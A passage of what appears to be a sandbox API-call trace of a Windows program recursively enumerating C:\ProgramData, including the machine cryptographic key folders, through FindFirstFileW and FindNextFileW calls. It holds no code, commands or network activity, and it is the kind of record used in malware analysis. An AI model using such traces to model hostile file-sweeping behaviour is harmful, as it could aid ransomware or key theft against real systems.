lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 1 [0139.765] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Desktop\\*", lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0xffffffff [0139.765] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2247a58 | out: hHeap=0x20f0000) returned 1 [0139.765] FindNextFileW (in: hFindFile=0xa328e8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 1 [0139.765] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Documents\\*", lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0xffffffff [0139.766] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2247a58 | out: hHeap=0x20f0000) returned 1 [0139.766] FindNextFileW (in: hFindFile=0xa328e8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 1 [0139.766] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Favorites\\*", lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0xffffffff [0139.766] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2247a58 | out: hHeap=0x20f0000) returned 1 [0139.766] FindNextFileW (in: hFindFile=0xa328e8, lpFindFileData=0x253f9a4 | out: lpFindFileData=0x253f9a4) returned 1 [0139.766] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\*", lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 0xa32928 [0139.766] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0139.766] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0139.766] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32968 [0139.766] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.766] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.767] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa329a8 [0139.767] FindNextFileW (in: hFindFile=0xa329a8, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0139.767] FindNextFileW (in: hFindFile=0xa329a8, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0139.767] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa329e8 [0139.767] FindNextFileW (in: hFindFile=0xa329e8, lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 1 [0139.767] FindNextFileW (in: hFindFile=0xa329e8, lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 1 [0139.767] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*", lpFindFileData=0x253ed10 | out: lpFindFileData=0x253ed10) returned 0xa32a28 [0139.768] FindNextFileW (in: hFindFile=0xa32a28, lpFindFileData=0x253ed10 | out: lpFindFileData=0x253ed10) returned 1 [0139.768] FindNextFileW (in: hFindFile=0xa32a28, lpFindFileData=0x253ed10 | out: lpFindFileData=0x253ed10) returned 1 [0139.768] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0139.769] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0139.769] FindNextFileW (in: hFindFile=0xa329e8, lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0 [0139.769] FindClose (in: hFindFile=0xa329e8 | out: hFindFile=0xa329e8) returned 1 [0139.769] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0139.769] FindNextFileW (in: hFindFile=0xa329a8, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0 [0139.769] FindClose (in: hFindFile=0xa329a8 | out: hFindFile=0xa329a8) returned 1 [0139.769] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0139.769] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0 [0139.769] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0139.769] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0139.770] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0139.770] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32968 [0139.771] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.777] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.778] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa329a8 [0139.778] FindNextFileW (in: hFindFile=0xa329a8, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0139.778] FindNextFileW (in: hFindFile=0xa329a8, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0139.778] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa329e8 [0139.778] FindNextFileW (in: hFindFile=0xa329e8, lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 1 [0139.778] FindNextFileW (in: hFindFile=0xa329e8, lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0 [0139.778] FindClose (in: hFindFile=0xa329e8 | out: hFindFile=0xa329e8) returned 1 [0139.779] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0139.779] FindNextFileW (in: hFindFile=0xa329a8, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0 [0139.779] FindClose (in: hFindFile=0xa329a8 | out: hFindFile=0xa329a8) returned 1 [0139.779] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0139.779] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.779] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa329a8 [0139.779] FindNextFileW (in: hFindFile=0xa329a8, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0139.779] FindNextFileW (in: hFindFile=0xa329a8, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0 [0139.779] FindClose (in: hFindFile=0xa329a8 | out: hFindFile=0xa329a8) returned 1 [0139.779] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0139.779] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.779] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa329a8 [0139.780] FindNextFileW (in: hFindFile=0xa329a8, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0139.780] FindNextFileW (in: hFindFile=0xa329a8, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0139.780] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa329e8 [0139.780] FindNextFileW (in: hFindFile=0xa329e8, lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 1 [0139.780] FindNextFileW (in: hFindFile=0xa329e8, lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0 [0139.780] FindClose (in: hFindFile=0xa329e8 | out: hFindFile=0xa329e8) returned 1 [0139.780] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0139.780] FindNextFileW (in: hFindFile=0xa329a8, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0139.780] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa329e8 [0139.780] FindNextFileW (in: hFindFile=0xa329e8, lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 1 [0139.780] FindNextFileW (in: hFindFile=0xa329e8, lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 1 [0139.780] FindClose (in: hFindFile=0xa329e8 | out: hFindFile=0xa329e8) returned 1 [0139.780] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0139.780] FindNextFileW (in: hFindFile=0xa329a8, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0 [0139.780] FindClose (in: hFindFile=0xa329a8 | out: hFindFile=0xa329a8) returned 1 [0139.780] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0139.781] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0 [0139.781] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0139.781] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0139.781] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0139.782] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32968 [0139.782] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.782] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.782] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa329a8 [0139.782] FindNextFileW (in: hFindFile=0xa329a8, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0139.782] FindNextFileW (in: hFindFile=0xa329a8, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0139.782] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa329e8 [0139.783] FindNextFileW (in: hFindFile=0xa329e8, lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 1 [0139.783] FindNextFileW (in: hFindFile=0xa329e8, lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 1 [0139.783] FindClose (in: hFindFile=0xa329e8 | out: hFindFile=0xa329e8) returned 1 [0139.784] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0139.784] FindNextFileW (in: hFindFile=0xa329a8, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0139.784] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa329e8 [0139.784] FindNextFileW (in: hFindFile=0xa329e8, lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 1 [0139.784] FindNextFileW (in: hFindFile=0xa329e8, lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 1 [0139.785] FindClose (in: hFindFile=0xa329e8 | out: hFindFile=0xa329e8) returned 1 [0139.785] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0139.785] FindNextFileW (in: hFindFile=0xa329a8, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0 [0139.785] FindClose (in: hFindFile=0xa329a8 | out: hFindFile=0xa329a8) returned 1 [0139.785] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0139.785] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.785] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa329a8 [0139.785] FindNextFileW (in: hFindFile=0xa329a8, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0139.785] FindNextFileW (in: hFindFile=0xa329a8, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0139.785] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa329e8 [0139.785] FindNextFileW (in: hFindFile=0xa329e8, lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 1 [0139.785] FindNextFileW (in: hFindFile=0xa329e8, lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 1 [0139.785] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*", lpFindFileData=0x253ed10 | out: lpFindFileData=0x253ed10) returned 0xa32a28 [0139.785] FindNextFileW (in: hFindFile=0xa32a28, lpFindFileData=0x253ed10 | out: lpFindFileData=0x253ed10) returned 1 [0139.785] FindNextFileW (in: hFindFile=0xa32a28, lpFindFileData=0x253ed10 | out: lpFindFileData=0x253ed10) returned 1 [0139.785] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0139.786] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0139.786] FindNextFileW (in: hFindFile=0xa329e8, lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 1 [0139.786] FindClose (in: hFindFile=0xa329e8 | out: hFindFile=0xa329e8) returned 1 [0139.786] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0139.786] FindNextFileW (in: hFindFile=0xa329a8, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0139.786] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa329e8 [0139.786] FindNextFileW (in: hFindFile=0xa329e8, lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 1 [0139.786] FindNextFileW (in: hFindFile=0xa329e8, lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 1 [0139.786] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*", lpFindFileData=0x253ed10 | out: lpFindFileData=0x253ed10) returned 0xa32a28 [0139.786] FindNextFileW (in: hFindFile=0xa32a28, lpFindFileData=0x253ed10 | out: lpFindFileData=0x253ed10) returned 1 [0139.786] FindNextFileW (in: hFindFile=0xa32a28, lpFindFileData=0x253ed10 | out: lpFindFileData=0x253ed10) returned 1 [0139.786] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0139.786] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0139.786] FindNextFileW (in: hFindFile=0xa329e8, lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 1 [0139.787] FindClose (in: hFindFile=0xa329e8 | out: hFindFile=0xa329e8) returned 1 [0139.787] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0139.787] FindNextFileW (in: hFindFile=0xa329a8, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0 [0139.787] FindClose (in: hFindFile=0xa329a8 | out: hFindFile=0xa329a8) returned 1 [0139.787] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0139.787] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0 [0139.787] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0139.787] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0139.788] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0139.788] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32968 [0139.788] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.788] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0 [0139.788] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0139.788] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0139.788] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0139.788] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32968 [0139.788] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.788] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.789] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa329a8 [0139.789] FindNextFileW (in: hFindFile=0xa329a8, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0139.789] FindNextFileW (in: hFindFile=0xa329a8, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0 [0139.789] FindClose (in: hFindFile=0xa329a8 | out: hFindFile=0xa329a8) returned 1 [0139.789] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0139.789] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0 [0139.789] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0139.789] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0139.790] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0139.790] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32968 [0139.790] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.790] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.791] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\logs\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa329a8 [0139.791] FindNextFileW (in: hFindFile=0xa329a8, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0139.791] FindNextFileW (in: hFindFile=0xa329a8, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0 [0139.791] FindClose (in: hFindFile=0xa329a8 | out: hFindFile=0xa329a8) returned 1 [0139.791] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0139.791] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0 [0139.791] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0139.791] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0139.792] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0139.792] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32968 [0139.792] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.792] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.793] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa329a8 [0139.793] FindNextFileW (in: hFindFile=0xa329a8, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0139.793] FindNextFileW (in: hFindFile=0xa329a8, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0139.793] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa329e8 [0139.793] FindNextFileW (in: hFindFile=0xa329e8, lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 1 [0139.793] FindNextFileW (in: hFindFile=0xa329e8, lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0 [0139.793] FindClose (in: hFindFile=0xa329e8 | out: hFindFile=0xa329e8) returned 1 [0139.793] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0139.793] FindNextFileW (in: hFindFile=0xa329a8, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0 [0139.793] FindClose (in: hFindFile=0xa329a8 | out: hFindFile=0xa329a8) returned 1 [0139.793] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0139.793] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0 [0139.793] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0139.793] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0139.794] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0139.794] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32968 [0139.794] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.794] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.794] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0139.795] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0139.795] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0139.795] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Media Player\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32968 [0139.795] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.795] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0 [0139.795] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0139.795] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0139.795] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0139.795] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32968 [0139.795] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.795] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.795] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0139.795] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0139.795] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0139.795] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32968 [0139.795] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.795] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.796] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\8.0\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa329a8 [0139.796] FindNextFileW (in: hFindFile=0xa329a8, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0139.796] FindNextFileW (in: hFindFile=0xa329a8, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0 [0139.796] FindClose (in: hFindFile=0xa329a8 | out: hFindFile=0xa329a8) returned 1 [0139.796] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0139.796] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0 [0139.796] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0139.796] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0139.797] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0139.797] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32968 [0139.797] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.797] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.798] FindFirstFileW (in: 